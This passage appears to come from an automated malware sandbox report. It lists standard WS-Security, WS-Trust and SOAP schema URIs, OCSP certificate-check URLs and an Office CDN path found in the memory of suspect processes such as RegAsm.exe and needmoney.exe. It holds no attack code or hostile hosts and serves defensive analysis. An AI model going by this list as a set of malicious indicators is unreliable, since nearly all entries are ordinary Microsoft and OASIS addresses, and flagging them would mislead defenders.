Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: svchost.exe, 0000001A.00000003.2874602060.0000019DEAB30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
